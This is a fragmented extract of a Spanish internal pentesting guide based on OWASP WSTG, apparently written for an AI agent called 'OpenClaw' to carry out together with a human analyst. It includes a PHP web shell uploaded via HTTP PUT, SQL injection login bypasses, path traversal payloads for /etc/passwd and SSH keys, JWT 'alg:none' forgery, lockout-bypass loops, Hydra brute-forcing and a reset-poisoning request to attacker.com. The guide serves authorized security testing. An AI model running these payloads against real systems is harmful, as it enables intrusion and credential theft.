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GUIA DE PRUEBAS DE SEGURIDAD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EN APLICACIONES WEB</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="12" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="2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OWASP WSTG v4.2 — Procedimiento completo con ejemplos para Agente OpenClaw</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="5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 2.0 — Marzo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CONFIDENCIAL — Solo uso interno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1. Introduccion y Objetivos (WSTG 4.0)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Esta guia es el procedimiento operativo de pruebas de seguridad en aplicaciones web disenado para ser ejecutado de forma colaborativa entre el analista humano y el agente OpenClaw. Cada seccion incluye descripcion tecnica, ejemplos reales, payloads, comandos y criterios de exito/fallo.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Definiciones fundamentales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Termino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Definicion con ejemplo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Vulnerabilidad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Falla en diseno, implementacion u operacion. Ej: un campo de busqueda que acepta ' OR 1=1-- sin validacion.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Amenaza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Cualquier actor que pueda explotar una vulnerabilidad. Ej: atacante externo que usa SQLi para volcar la BD.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Riesgo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Probabilidad x Impacto. Ej: SQLi en login = probabilidad alta x impacto critico = riesgo critico.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Superficie de ataque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Conjunto de puntos de entrada. Ej: formularios, APIs, cookies, cabeceras HTTP, WebSockets, archivos subidos.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Prueba pasiva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Observar sin interactuar. Ej: analizar trafico HTTP con Burp en modo intercept-off.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Prueba activa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Interactuar con la aplicacion. Ej: enviar ' en cada campo y observar si cambia el comportamiento.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Falso positivo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Herramienta reporta vuln que no existe. Siempre verificar manualmente.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Falso negativo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Vuln existe pero no se detecto. Razon principal para combinar automatizacion + revision manual.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Reglas de Compromiso — Tabla a completar antes de iniciar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URL(s) objetivo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IP(s) autorizadas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Entorno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Produccion  [ ] Staging  [ ]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Caja Negra  [ ] Caja Gris  [ ] Caja Blanca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Credenciales provistas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Si  [ ]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Periodo autorizado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Desde: ___ Hasta: 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Ventana horaria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24/7  [ ] Solo fuera horario laboral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Acciones destructivas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Permitidas  [ ] Prohibidas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Notificacion a equipos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] DevOps  [ ] DBA  [ ] Networking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Contacto emergencia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Nombre: ___ Tel: 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Clausula de no afectacion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Firmado: [ ] Si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2. Recoleccion de Informacion (WSTG 4.1)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Objetivo de la fase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Mapear la superficie de ataque completa antes de ejecutar pruebas activas. Cuanta mas informacion se recoja en esta fase, mas efectivas seran las pruebas posteriores.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4.1.1 Reconocimiento por Motores de Busqueda (WSTG-INFO-01)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Usar operadores avanzados de motores de busqueda para encontrar informacion sensible indexada publicamente sin interactuar directamente con la aplicacion objetivo.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Google Dorks — Ejemplos por categoria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Archivos de configuracion y credenciales expuestas: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filetype:env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filetype:config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"DB_PASSWORD" OR "DB_HOST" OR "API_KEY"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filetype:sql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filetype:bak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inurl:".git" filetype:config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ext:yaml "password:" OR "secret:"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Paneles de administracion y login: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inurl:admin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inurl:login OR inurl:signin OR inurl:dashboard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intitle:"admin panel" OR intitle:"control panel"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inurl:wp-admin OR inurl:administrator OR inurl:phpmyadmin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Informacion sensible en paginas publicas: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"Index of /"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"parent directory"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filetype:log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filetype:xls OR filetype:xlsx "confidential"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"phpinfo()" OR "PHP Version"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site:objetivo.com inurl:error OR inurl:debug OR inurl:trace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Busquedas en repositorios de codigo (GitHub/GitLab):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site:github.com "objetivo.com" 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site:github.com "objetivo.com" api_key OR secret_key OR access_token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site:pastebin.com "objetivo.com" password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Shodan — ejemplos de busqueda por organizacion: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org:"Nombre Empresa" port:443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org:"Nombre Empresa" http.title:"Login"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hostname:objetivo.com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ssl:"objetivo.com" port:8443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org:"Nombre Empresa" product:"Apache httpd"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Evidencia esperada y criterio de exito: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HALLAZGO si: se encuentran credenciales, claves API, rutas internas o archivos de config indexados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OK si: ningun resultado sensible aparece en motores de busqueda para el dominio objetivo</w:t>
      </w:r>
    </w:p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4.1.2 Fingerprinting del Servidor Web (WSTG-INFO-02)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Identificar el tipo y version del servidor web analizando cabeceras HTTP, banners de error y comportamiento ante peticiones inusuales.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Ejemplo de cabeceras reveladoras — servidor Apache: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HTTP/1.1 200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Server: Apache/2.4.51 (Unix) OpenSSL/1.1.1l PHP/7.4.24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X-Powered-By: PHP/7.4.24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X-Generator: WordPress 6.2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Revela: Apache 2.4.51 (vulnerable a CVE-2021-41773 si 2.4.49/2.4.50)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Revela: PHP 7.4.24 (EOL, sin soporte de seguridad desde Nov 2022)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Ejemplo — servidor IIS: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HTTP/1.1 200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Server: Microsoft-IIS/10.0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X-Powered-By: ASP.NET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X-AspNet-Version: 4.0.30319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Revela: IIS 10.0 (Windows Server 2016/2019)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Revela: ASP.NET 4.0 con posibles vulns de viewstate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Peticion con metodo invalido para revelar banner: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FUZZ / HTTP/1.0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Respuesta tipica de Nginx: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HTTP/1.1 400 Bad Request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Server: nginx/1.21.6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Respuesta tipica de Apache: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HTTP/1.1 501 Not Implemented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Server: Apache/2.4.51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Herramientas y comandos OpenClaw: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-I https://objetivo.com                      # cabeceras de respuesta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-v https://objetivo.com 2&gt;&amp;1 | head -50      # verbose con negociacion TLS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whatweb https://objetivo.com                       # fingerprint automatico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nmap -sV -p 80,443,8080,8443 objetivo.com         # version de servicio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httprint -h objetivo.com -s signatures.txt        # fingerprint por firma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4.1.3 Revision de Metaarchivos del Servidor (WSTG-INFO-03)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Examinar robots.txt, sitemap.xml y otros archivos de metadatos que pueden revelar rutas internas o zonas restringidas.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Ejemplo de robots.txt vulnerable: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User-agent: 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Disallow: /admin/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Disallow: /backup/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Disallow: /api/internal/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Disallow: /config/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Disallow: /test/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Disallow: /.git/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Todas las rutas en Disallow son candidatas de prueba inmediata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Probar: GET /admin/ GET /backup/ GET /.git/config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Ejemplo de .git/ expuesto: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/.git/config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Respuesta si esta expuesto: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[core]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repositoryformatversion =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filemode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[remote "origin"]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url = https://github.com/empresa/aplicacion-privada.git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Con git-dumper se puede reconstruir el codigo fuente completo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Comando: git-dumper https://objetivo.com/.git/ ./repo-recovered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Rutas a verificar siempre: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/robots.txt          /sitemap.xml         /sitemap_index.xml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/.well-known/security.txt                 /crossdomain.xml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/clientaccesspolicy.xml                   /.htaccess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/.git/config         /.svn/entries        /.hg/hgrc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/WEB-INF/web.xml     /META-INF/MANIFEST.MF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/phpinfo.php         /info.php            /test.php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4.1.4 Enumeracion de Aplicaciones en el Servidor (WSTG-INFO-04)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Identificar todas las aplicaciones web alojadas en el mismo servidor fisico o IP, incluyendo virtual hosts, subdominios y puertos no estandar.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Enumeracion de subdominios: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amass - enumeracion pasiva y activa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amass enum -d objetivo.com -o subdominios.txt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subfinder - multiples fuentes OSINT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subfinder -d objetivo.com -o subfinder.txt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dnsx - resolucion masiva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cat subdominios.txt | dnsx -resp -a -cname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Virtual host brute force con ffuf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ffuf -w /usr/share/wordlists/vhosts.txt -u https://objetivo.com/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-H "Host: FUZZ.objetivo.com" -fs 1234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Escaneo de puertos HTTP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nmap -p 80,443,8000,8080,8443,8888,3000,5000,7001,9090 -sV objetivo.com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Ejemplo de descubrimiento via virtual hosting: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Peticion con Host diferente al default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-H "Host: internal.objetivo.com" https://1.2.3.4/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responde diferente =&gt; virtual host descubierto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Probar: dev.objetivo.com, staging.objetivo.com, api.objetivo.com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        admin.objetivo.com, old.objetivo.com, beta.objetivo.com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4.1.5 Fugas de Informacion en Contenido Web (WSTG-INFO-05)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Buscar informacion sensible oculta en el codigo fuente HTML, comentarios HTML/JS, metadata de archivos y codigo JavaScript del frontend.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Ejemplos de hallazgos en codigo fuente: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&lt;!-- TODO: remove hardcoded admin password: Admin@2024!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&lt;!-- DEBUG: DB connection: mysql://admin:pass123@192.168.1.5/prod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&lt;!-- Internal API: https://internal-api.empresa.com/v2/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En archivo main.js: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API_KEY = 'sk-prod-xxxxxxxxxxxxxxxxxxx';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AWS_SECRET = 'wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY';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var STRIPE_KEY = 'pk_live_XXXXXXXXXXXXXXXXXXXX';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Rutas internas en bundle JS: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apiEndpoints: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users: '/api/internal/v1/users',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admin: '/api/admin/manage',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Herramientas de extraccion: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Buscar strings sensibles en todo el JS del sitio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wget -r -l 3 https://objetivo.com -P ./site-copy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grep -r "password\|api_key\|secret\|token\|AWS\|sk-" ./site-copy/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Extraccion de endpoints de archivos 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python3 linkfinder.py -i https://objetivo.com/main.js -o cli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Metadata de documentos PDF/DOCX descargados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exiftool documento.pdf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Puede revelar: autor, software, rutas internas del sistema de archivos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4.1.6 Identificacion de Puntos de Entrada (WSTG-INFO-06)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Catalogar exhaustivamente todos los vectores de entrada de datos de la aplicacion. Cada punto de entrada es un potencial vector de ataque.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Inventario de puntos de entrada — ejemplo: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21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requerida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https://obj.com/login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username, password, csrf_token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https://obj.com/search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q, page, sort,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https://obj.com/api/users/{id}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GET/PUT/DELETE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id (path), Bearer Token (header)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https://obj.com/upload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file (multipart), type,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https://obj.com/profile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name, bio, email, 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https://obj.com/admin/report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start_date, end_date,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 (Admin)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4.1.7-10 Mapeo de Rutas, Framework, Aplicacion y Arquitectura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4.1.7 — Herramientas de crawling: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Burp Suite Spider (modo pasivo)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Configurar proxy: 127.0.0.1:8080 y navegar la aplicacion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OWASP ZAP Spider activo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zap-cli spider https://objetivo.com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Katana (crawling moderno con JS rendering)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katana -u https://objetivo.com -jc -d 5 -o endpoints.txt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Feroxbuster - directory brute force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feroxbuster -u https://objetivo.com -w /usr/share/wordlists/dirb/common.txt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4.1.8/4.1.9 — Fingerprint de framework y aplicacion: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WhatWeb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whatweb -v https://objetivo.com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Wappalyzer CLI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wappalyzer https://objetivo.com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Indicadores por framework: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WordPress:   /wp-json/wp/v2/  cookie: wordpress_logged_in_  /wp-content/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Laravel:     cookie: laravel_session  header: X-Laravel-Version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Rails:       cookie: _session_id  X-Request-Id  _rails-session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Django:      cookie: csrftoken, sessionid  header: X-Frame-Options: SAMEORIGIN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Spring Boot: /actuator/  /actuator/health  /actuator/env  X-Application-Context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Express.js:  header: X-Powered-By: Express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ASP.NET:     cookie: ASP.NET_SessionId  __VIEWSTATE  __EVENTVALIDATION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4.1.10 — Mapeo de arquitectura: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Detectar WAF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wafw00f https://objetivo.com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Detectar CDN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dig objetivo.com        # Revisar registros A/CNAME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-I https://objetivo.com | grep -i 'CF-RAY\|X-Cache\|Via\|Age'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Traceroute hacia el servidor real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traceroute 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Buscar IP real detras de Cloudflare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1. Revisar historial DNS: dnsdumpster.com, securitytrails.com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2. Buscar en Shodan con: ssl.cert.subject.CN:objetivo.com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3. Revisar MX records: el mail server puede apuntar a la IP real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Recoleccion de Informacion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INFO-01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Dorks y Shodan recon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 sensible indexada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Busqueda web / Shodan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INFO-02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Fingerprint servidor web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Tipo, version, CVEs aplicables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curl -I / nmap -sV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INFO-03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Metaarchivos del servidor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Rutas en robots.txt, .git expuesto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GET directo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INFO-04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Enumeracion de apps y vhosts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Todas las apps en el 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amass / subfinder / ffuf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INFO-05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Fugas en contenido web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Credenciales/API keys en HTML/JS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/ linkfinder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INFO-06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Identificacion de entry points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Inventario completo de inputs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Burp / Katana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INFO-07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Mapeo de rutas de ejecucion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Arbol de navegacion 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feroxbuster / ZAP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INFO-08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Fingerprint de framework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Framework, version, CVEs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WhatWeb / Wappalyzer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INFO-09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Fingerprint de aplicacion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CMS/App especifica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WhatWeb / nmap scripts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INFO-10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Mapeo de arquitectura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WAF, CDN, proxies, microservicios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wafw00f / dig / traceroute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3. Configuracion y Despliegue (WSTG 4.2)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4.2.1 Configuracion de Infraestructura de Red (WSTG-CONF-01)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Escaneo de puertos y servicios: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Escaneo completo de puertos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nmap -sV -sC -p- --open -T4 objetivo.com -oN nmap_full.txt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Servicios comunes que NO deberian estar expuestos publicamente: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22/tcp   SSH    =&gt; Si esta expuesto, verificar autenticacion por clave, no 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3306/tcp MySQL  =&gt; NUNCA expuesto a internet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5432/tcp PgSQL  =&gt; NUNCA expuesto a internet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6379/tcp Redis  =&gt; NUNCA expuesto a internet (sin auth por defecto)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27017    MongoDB=&gt; NUNCA expuesto (sin auth por defecto historicamente)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9200/tcp Elastic=&gt; NUNCA expuesto (sin auth por defecto)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8080/tcp Tomcat =&gt; Verificar si /manager/html esta accesible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4848    GlassFish admin =&gt; NUNCA expuesto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Hallazgo critico — Redis sin autenticacion expuesto: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redis-cli -h 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objetivo.com:6379&gt; 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objetivo.com:6379&gt; KEYS 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1) "session:abc123"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2) "user:token:456"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CRITICO: acceso completo a sesiones de usuario sin autenticacion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4.2.2 Configuracion de la Plataforma (WSTG-CONF-02)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Directory Listing habilitado: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/uploads/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Host: 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HTTP/1.1 200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Content-Type: text/html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&lt;html&gt;&lt;body&gt;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&lt;h1&gt;Index of /uploads/&lt;/h1&gt;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&lt;a href='backup_database_20240115.sql'&gt;backup_database_20240115.sql&lt;/a&gt;  14MB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&lt;a href='credentials.xlsx'&gt;credentials.xlsx&lt;/a&gt;  23KB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&lt;a href='shell.php'&gt;shell.php&lt;/a&gt;  2KB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&lt;/body&gt;&lt;/html&gt;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CRITICO: listado de directorio expone archivos sensibles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Pagina por defecto del servidor expuesta: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 HTTP/1.1  Host: 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se ve la pagina de bienvenida de Apache/Nginx/IIS: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Revela version exacta del servidor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Indica que el servidor no fue configurado correctamente para produccion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Archivo a revisar: /var/www/html/index.html (default Apache)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Archivos de configuracion accesibles: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/.env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HTTP/1.1 200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DB_HOST=prod-db.interno.com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DB_NAME=produccion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DB_USER=root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DB_PASSWORD=SuperSecretPass2024!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APP_SECRET=la-clave-secreta-de-jwt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STRIPE_SECRET=sk_live_XXXXXXXXXXXXXXXXXXXX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CRITICO: credenciales de produccion expuestas publicamente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4.2.3 Manejo de Extensiones de Archivo (WSTG-CONF-03)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Ejemplos de extensiones peligrosas a probar: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potencial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archivo.php.bak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Podria servir codigo fuente PHP como texto plano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config.php~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Archivo temporal de editor, puede contener configuracion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backup.php.old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 antigua del archivo, potencialmente vulnerable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upload.php%00.jpg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 byte injection para bypassear validacion de extension (PHP &lt; 5.3)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shell.aspx;.jpg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Bypass en IIS para ejecutar ASPX disfrazado de imagen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test.php.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Punto al final puede bypassear algunas validaciones en Windows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4.2.4 Archivos de Backup y No Referenciados (WSTG-CONF-04)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Wordlist de archivos de backup a fuzzear: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ffuf para buscar archivos de backup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ffuf -u https://objetivo.com/FUZZ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-w /usr/share/wordlists/backups.txt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-mc 200 -o hallazgos.json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Patrones tipicos a incluir en la wordlist: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index.php.bak    index.php~     index.php.old   index.php.save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config.php.bak   config.old     web.config.bak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database.sql     db_backup.sql  dump.sql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backup.zip       backup.tar.gz  www.zip  site.tar.gz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.DS_Store        Thumbs.db      desktop.ini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wp-config.php.bak   settings.py.bak   application.properties.bak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Extraccion de .DS_Store para mapear directorios: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-O https://objetivo.com/.DS_Store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python3 ds_store_exp.py .DS_Store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 ejemplo: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css/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js/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admin_backup/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api_keys_old.txt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database_export.csv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4.2.5 Interfaces de Administracion (WSTG-CONF-05)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Rutas de admin a fuzzear — wordlist completa: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/admin          /admin/         /admin/login    /administrator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/wp-admin       /wp-login.php   /wp-admin/      /wordpress/wp-admin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/phpmyadmin     /pma            /mysql          /adminer.php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/manager/html   /host-manager   /jenkins        /jenkins/login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/console        /jmx-console    /web-console    /invoker/JMXInvokerServlet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/_admin         /manage         /management     /siteadmin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/cpanel         /whm            /plesk          /da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/admin.php      /admin.html     /admin.asp      /admin.aspx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/backend        /backoffice     /control        /portal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/grafana        /kibana         /zabbix         /nagios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/actuator       /actuator/env   /actuator/health /actuator/beans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Hallazgo — Spring Boot Actuator expuesto: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/actuator/env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HTTP/1.1 200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"activeProfiles": ["production"],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"propertySources": [{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"name": "applicationConfig",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"properties":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"spring.datasource.password": {"value": "ProdPassword2024!"},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"jwt.secret": {"value": "my-super-secret-jwt-key"}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CRITICO: credenciales expuestas via actuator sin autenticacion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4.2.6 Metodos HTTP (WSTG-CONF-06)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Descubrimiento de metodos permitidos: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-X OPTIONS -I https://objetivo.com/api/users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HTTP/1.1 200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Allow: GET, POST, PUT, DELETE, PATCH, OPTIONS, TRACE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TRACE habilitado =&gt; vulnerabilidad XST (Cross-Site Tracing)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-X TRACE https://objetivo.com/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HTTP/1.1 200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TRACE /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Host: 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Cookie: session=abcdef123456     &lt;= El servidor refleja las cookies!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Authorization: Bearer eyJhbGc...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MEDIO: TRACE puede usarse para robar cabeceras de autenticacion via XSS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PUT habilitado — upload de archivo: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-X PUT https://objetivo.com/uploads/shell.php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--data '&lt;?php system($_GET["cmd"]); ?&gt;'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HTTP/1.1 201 Created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'https://objetivo.com/uploads/shell.php?cmd=id'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uid=33(www-data) gid=33(www-data) groups=33(www-data)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CRITICO: RCE mediante HTTP PUT habilitado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4.2.7 HSTS (WSTG-CONF-07)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Verificacion de HSTS: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-I https://objetivo.com | grep -i strict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Configuracion CORRECTA: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Strict-Transport-Security: max-age=31536000; includeSubDomains; preload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Configuracion INCORRECTA (max-age demasiado bajo):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Strict-Transport-Security: max-age=0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Ausencia total de HSTS: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El navegador puede hacer la primera peticion por HTTP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MITM posible en la primera conexion (SSLstrip)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que HTTP redirige a HTTPS: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-I http://objetivo.com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HTTP/1.1 301 Moved Permanently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Location: https://objetivo.com/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4.2.10 Subdomain Takeover (WSTG-CONF-10)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Deteccion de subdominios vulnerables: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1. Enumerar subdominios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amass enum -d objetivo.com | tee subdominios.txt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2. Verificar registros CNAME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cat subdominios.txt | xargs -I{} dig {} CNAME +short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Ejemplo de hallazgo vulnerable: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blog.objetivo.com     CNAME    objetivo.ghost.io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3. Verificar si el servicio destino existe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-I https://objetivo.ghost.io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HTTP/1.1 404 Not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X-Ghost-Blog-URL: objetivo.ghost.io doesnt exist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4. Reclamar el subdominio en Ghost (o S3, Heroku, etc.)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Ahora blog.objetivo.com sirve contenido controlado por el atacante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Puede usarse para phishing, robo de cookies del dominio padre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Herramienta automatizada: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subjack -w subdominios.txt -t 20 -timeout 30 -o results.txt -ssl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4.2.11 Cloud Storage (WSTG-CONF-11)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S3 Bucket publico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aws s3 ls s3://objetivo-backups --no-sign-request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devuelve contenido =&gt; bucket publico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aws s3 cp s3://objetivo-backups/database.sql . --no-sign-request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escritura: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aws s3 cp test.txt s3://objetivo-backups/ --no-sign-request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Google Cloud Storage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https://storage.googleapis.com/objetivo-prod/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Azure Blob Storage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https://objetivo.blob.core.windows.net/backups?restype=container&amp;comp=list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Herramienta: S3Scanner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s3scanner scan --buckets objetivo-prod,objetivo-backup,objetivo-static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Configuracion y Despliegue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Infraestructura de red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servicios internos expuestos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nmap -sV -p-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Configuracion de plataforma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dir listing, sin config expuesta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requests / ffuf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Extensiones de archivo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codigo fuente accesible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Extension fuzzing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Archivos de backup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archivos residuales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ffuf con wordlist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Interfaces de admin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no accesible sin VPN/auth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wordlist ffuf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Metodos HTTP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TRACE/PUT habilitados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OPTIONS / TRACE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HSTS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max-age&gt;=31536000 + includeSubDomains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curl -I + sslyze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Cross-domain policy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Politicas restrictivas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GET policy files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Permisos de archivos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archivos sensibles legibles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requests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Subdomain takeover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subdominios huerfanos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subjack / amass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buckets publicos no autorizados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cli / S3Scanner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4. Gestion de Identidad (WSTG 4.3)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4.3.4 Enumeracion de Cuentas (WSTG-IDNT-04)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Esta es la prueba mas critica de la seccion. Se verifican diferencias observables que permitan confirmar si un usuario existe.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Caso 1 — Diferencia en mensaje de error de login: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Con usuario INVALIDO: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/login  {"user":"noexiste@test.com", "pass":"xxx"}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Respuesta: {"error": "Usuario no encontrado"}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Con usuario VALIDO pero password incorrecta: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/login  {"user":"admin@objetivo.com", "pass":"xxx"}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Respuesta: {"error": "Contrasena incorrecta"}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ALTO: el mensaje diferente confirma que admin@objetivo.com existe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 CORRECTA (no enumerable):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Respuesta: {"error": "Credenciales invalidas"}  // Mismo mensaje siempre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Caso 2 — Diferencia en tiempo de respuesta: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Medir tiempo con usuario invalido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time curl -X POST https://objetivo.com/login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-d 'user=noexiste&amp;pass=xxx'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real    0m0.082s    # respuesta rapida (usuario no existe, no se busca hash)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Medir tiempo con usuario valido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time curl -X POST https://objetivo.com/login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-d 'user=admin@obj.com&amp;pass=xxx'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real    0m0.347s    # respuesta mas lenta (se computo el hash de la password)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MEDIO: diferencia de tiempo ~265ms indica que el usuario existe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Caso 3 — Enumeracion via recuperacion de contrasena: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Con email NO registrado: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/forgot-password {"email": "noexiste@test.com"}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Respuesta: {"error": "No existe cuenta con ese email"}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Con email SI registrado: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/forgot-password {"email": "victima@objetivo.com"}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Respuesta: {"message": "Email de recuperacion enviado"}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Permite enumerar emails registrados en la plataforma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Caso 4 — Enumeracion via registro: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Intentar registrar un email ya existente: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/register {"email": "admin@objetivo.com", "pass": "Test1234!"}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Respuesta: {"error": "El email ya esta registrado"}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vs email nuevo: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/register {"email": "nuevo@test.com", "pass": "Test1234!"}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Respuesta: {"message": "Cuenta creada exitosamente"}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ALTO: confirma que admin@objetivo.com tiene cuenta activa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Gestion de Identidad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IDNT-01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Definicion de roles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Roles con minimos privilegios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Analisis manual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IDNT-02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Registro de usuarios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Validacion de identidad en registro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requests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IDNT-03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Aprovisionamiento de cuentas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Proceso seguro de creacion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Analisis de flujo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IDNT-04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Enumeracion de cuentas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Mensaje unico para user/pass invalidos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 responses / timing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IDNT-05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Politica de usernames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usernames predecibles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Analisis de politica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5. Pruebas de Autenticacion (WSTG 4.4)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4.4.1 Credenciales sobre Canal Cifrado (WSTG-ATHN-01)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Verificacion de formulario de login servido por HTTP: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si el formulario esta en HTTP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-s http://objetivo.com/login | grep -i 'action='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&lt;form action="http://objetivo.com/process_login" method="post"&gt;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ALTO: credenciales enviadas por HTTP son visibles en red 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mixed content en la pagina de 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-s https://objetivo.com/login | grep -i 'http://'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hay scripts o forms usando http:// =&gt; riesgo de downgrade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redirect HTTP -&gt; HTTPS con credenciales en URL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-I http://objetivo.com/login?user=admin&amp;pass=1234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el redirect incluye los parametros =&gt; credenciales en logs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4.4.2 Credenciales por Defecto (WSTG-ATHN-02)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Lista de credenciales por defecto mas comunes por plataforma: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Credencial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Plataforma tipica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 / admin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WordPress, Joomla, muchos routers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 / password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Cisco, Juniper, F5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 / 1234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Camaras IP, IoT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 / (vacio)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Algunos routers domésticos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root / root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Bases de datos mal configuradas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administrator / administrator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Windows Server por defecto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 / changeme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Productos empresariales primera instalacion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guest / guest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Paneles de monitoreo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sa / (vacio)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MS SQL Server instalacion por defecto antigua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postgres / postgres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por defecto en algunos sistemas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 / admin@123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Grafana, Jenkins instalaciones nuevas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 / secret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HashiCorp Vault, algunos CMS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Automatizar con Hydra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hydra -L /usr/share/wordlists/default_users.txt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-P /usr/share/wordlists/default_passes.txt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https-post-form objetivo.com /login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'username=^USER^&amp;password=^PASS^:Invalid credentials'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4.4.3 Mecanismo de Bloqueo (WSTG-ATHN-03)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Script de prueba de bloqueo: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Enviar 15 intentos consecutivos fallidos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for i in $(seq 1 15); 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response=$(curl -s -X POST https://objetivo.com/login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-d 'username=admin&amp;password=wrong_pass_$i')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echo "Intento $i: $response"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sleep 0.5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Resultados posibles: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Intento  1-3: {"error": "Credenciales invalidas"}  =&gt;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Intento  4-5: {"error": "Credenciales invalidas"}  =&gt;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Intento  6:   {"error": "Credenciales invalidas"}  =&gt; PROBLEMA: no bloquea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Intento 15:   {"error": "Credenciales invalidas"}  =&gt; ALTO: sin lockout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 esperado (seguro):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Intento  5:   {"error": "Cuenta bloqueada por 15 minutos"}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o            {"error": "Demasiados intentos. Ingrese el CAPTCHA"}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Bypass de lockout por IP rotation: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Algunos sistemas bloquean por IP pero aceptan el header X-Forwarded-For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-X POST https://objetivo.com/login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-H 'X-Forwarded-For: 10.0.0.1'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-d 'username=admin&amp;password=wrong'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Rotar IPs falsas para evitar el bloqueo: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for i in $(seq 1 50); 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curl -X POST https://objetivo.com/login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-H "X-Forwarded-For: 10.0.0.$i"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-d 'username=admin&amp;password=intento$i'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ALTO si el lockout se basa solo en IP y acepta X-Forwarded-For falsificado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4.4.4 Bypass de Autenticacion (WSTG-ATHN-04)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Tecnica 1 — Acceso directo a URL protegida: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Sin autenticacion, acceder directamente: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https://objetivo.com/admin/dashboard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https://objetivo.com/api/admin/users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https://objetivo.com/profile?id=1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responde 200 con contenido =&gt; CRITICO: sin control de acceso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Tecnica 2 — SQL Injection en login (bypass clasico):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Payload en campo username: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OR '1'='1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OR '1'='1'--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OR '1'='1'/*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OR 1=1--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admin'--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admin' #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OR 'x'='x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') OR ('1'='1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Ejemplo de peticion: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username=' OR '1'='1'--&amp;password=cualquier_cosa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el backend hace: SELECT * FROM users WHERE username='$u' AND password='$p'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La query se convierte en: SELECT * FROM users WHERE username='' OR '1'='1'--'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Retorna todos los usuarios, autentica como el primero (generalmente admin)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Tecnica 3 — Manipulacion de parametros de sesion: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Cambiar role en cookie base64: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Cookie: session=eyJ1c2VyIjoiam9obiIsInJvbGUiOiJ1c2VyIn0=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Decodificar: {"user":"john","role":"user"}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Modificar: {"user":"john","role":"admin"}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Codificar: eyJ1c2VyIjoiam9obiIsInJvbGUiOiJhZG1pbiJ9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-H 'Cookie: session=eyJ1c2VyIjoiam9obiIsInJvbGUiOiJhZG1pbiJ9'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https://objetivo.com/admin/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CRITICO si funciona: cookie sin firma permite escalada de privilegios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4.4.9 Reset de Contrasena (WSTG-ATHN-09)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de token de reset predecible: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Solicitar reset para dos cuentas con 1 segundo de diferencia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Token 1 (t=1709000000): reset_abc123_1709000000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Token 2 (t=1709000001): reset_abc123_1709000001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Si el token contiene timestamp predecible, se puede brute-force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Prueba de token de un solo uso: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1. Solicitar reset =&gt; recibir token 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2. Usar token T =&gt; cambiar password =&gt;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3. Intentar usar el mismo token T otra vez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-X POST https://objetivo.com/reset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-d 'token=T&amp;password=NuevaPass123!'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acepta el token una segunda vez =&gt; ALTO: tokens reutilizables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Prueba de expiracion del token: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1. Solicitar token, esperar 25 horas, intentar usarlo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funciona despues de 24h =&gt; MEDIO: token no expira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Password Reset Poisoning via Host Header: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/forgot-password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Host: attacker.com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Content-Type: application/x-www-form-urlencoded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email=victima@objetivo.com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el servidor usa el Host header para construir el link de reset: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El email enviado a la victima contendra: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'Haz click aqui para resetear: https://attacker.com/reset?token=XYZ'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ALTO: atacante captura el token de reset de la victima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Autenticacion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ATHN-01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Canal cifrado para credenciales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 obligatorio, sin mixed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curl / Burp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ATHN-02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Credenciales por defecto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credenciales de fabrica activas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Hydra / lista manual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ATHN-03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Mecanismo de bloqueo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Lockout tras 5-10 intentos fallidos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 de brute force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ATHN-04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Bypass de autenticacion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acceso sin credenciales validas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 / URL direct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ATHN-05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Remember Me seguro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no predecible, con expiracion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Cookie analysis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ATHN-06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del navegador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Cache-Control: no-store en auth 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curl -I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ATHN-07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Politica de contrasenas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Complejidad minima impuesta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Password test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ATHN-08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Preguntas de seguridad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Respuestas no adivinables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OSINT analysis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ATHN-09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Reset de contrasena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Tokens seguros, de un solo uso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analysis / PoC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ATHN-10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Canales alternativos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Mismos controles en API/movil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testing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6. Autorizacion (WSTG 4.5)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4.5.1 Directory Traversal (WSTG-ATHZ-01)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Payloads de path traversal por sistema operativo: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../../../etc/passwd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Linux - lectura de usuarios del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..\..\..\windows\win.ini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Windows - archivo de configuracion del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....//....//....//etc/passwd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Doble codificacion, bypass de filtros simples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%2e%2e%2f%2e%2e%2fetc%2fpasswd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encoding del traversal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%252e%252e%252fetc%252fpasswd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Doble URL encoding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..%c0%af..%c0%afetc%c0%afpasswd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Codificacion UTF-8 no estandar (bypass IIS)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....\\....\\etc/passwd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Mixed slashes para bypass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/var/www/images/../../../etc/passwd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Traversal con ruta absoluta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....%2F....%2Fetc%2Fpasswd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Encoded slash con puntos duplicados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Ejemplo de prueba en parametro de descarga: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Parametro vulnerable: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/download?file=invoice_001.pdf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Payload de traversal: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/download?file=../../../etc/passwd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 si vulnerable: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HTTP/1.1 200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root:x:0:0:root:/root:/bin/bash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daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin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Archivos de alto valor en Linux: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/etc/passwd            /etc/shadow      /etc/hosts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/proc/self/environ     /proc/self/cmdline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/var/log/apache2/access.log            # log poisoning -&gt; RCE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/home/www-data/.ssh/id_rsa             # clave SSH privada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/var/www/html/.env                     # configuracion de la app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4.5.2 Bypass de Autorizacion (WSTG-ATHZ-02)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Bypass horizontal — acceder a recursos de otro usuario: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Autenticado como usuario ID=100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/api/users/100/invoices  Authorization: Bearer eyJ...(token de user 100)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HTTP/1.1 200 OK =&gt; Lista de facturas de user 100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Cambiar ID por el de otro usuario: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/api/users/101/invoices  Authorization: Bearer eyJ...(token de user 100)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responde 200 con datos de user 101 =&gt; CRITICO: IDOR/Broken Auth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Bypass vertical — escalar a admin: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JWT con rol 'user':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eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9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.eyJ1c2VyX2lkIjoxMDAsInJvbGUiOiJ1c2VyIn0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.HMAC_SIGNATURE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Payload decodificado: {"user_id":100, "role":"user"}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Modificar payload: {"user_id":100, "role":"admin"}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Ataque 'alg:none' (si el servidor acepta algoritmo none):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eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0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.eyJ1c2VyX2lkIjoxMDAsInJvbGUiOiJhZG1pbiJ9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-H 'Authorization: Bearer eyJhbGciOiJub25lIn0.eyJ1c2VyX2lkIjoxMDAsInJvbGUiOiJhZG1pbiJ9.'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https://objetivo.com/admin/users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CRITICO si funciona: servidor acepta JWT sin firma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Manipulacion de parametros de autorizacion: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Cambiar parametro de rol en request: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/update-profile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{"name": "John", "email": "john@test.com", "role": "admin"}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el servidor acepta el campo 'role' del cliente =&gt; Mass Assignment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Bypass via path alternativo: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/admin/users       =&gt; 403 Forbidden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/Admin/users       =&gt; 200 OK (case-sensitive bypass)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/admin/users/      =&gt; 200 OK (trailing slash bypass)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/admin;/users      =&gt; 